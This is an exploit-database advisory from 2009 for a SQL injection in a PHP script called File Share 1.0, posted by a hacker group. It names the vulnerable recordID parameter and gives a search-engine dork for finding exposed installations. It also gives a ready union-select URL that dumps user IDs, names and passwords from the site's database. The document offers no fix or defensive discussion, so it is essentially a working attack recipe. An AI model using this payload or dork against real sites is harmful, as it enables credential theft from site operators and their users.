File Share 1.0 - SQL Injection

EDB-ID:

10497

CVE:

N/A




Platform:

PHP

Date:

2009-12-16


##########################- Alg3r!eN H4xoRz -######################

[-]            FILE SHARE V 1.0  SQL Injection Vulnerability
[-] Author    : TOP SAT 13
[-] MAIL      : topsat13@live.fr<mailto:topsat13@live.fr>  'Or'   Dz8@live.com<mailto:Dz8@live.com>

############################################################/

[ Software Information ]

[/] Vendor : http://www.script-ati.com
[/] script   : FILE SHARE V 1.0
[/] Download : http://www.script-ati.com<http://www.script-ati.com/>
[/] Vulnerability : php SQL injection
[/] Dork :inurl:"inurl:file.php?recordID="
                       "FILE SHARE V 1.0"

############################################################/
[ Vulnerable File ]

http://server/path/file.php?recordID=[ t o p S q l ]

[ Exploit ]

http://server/path/file.php?recordID=xx+union+select+1,group_concat(id,0x3a3a,nom,0x3a3a,pass),3,4,5,6,7,8,9,10+from+mombre--

[  Gr44ts ]

[~]: cRuT$Y - DeR_KOniG - Hunter Hacker - DOWNWOW - Dr.orYX - Cr3w-Dz - PMXs  & All My Muslims Hackerz :[~]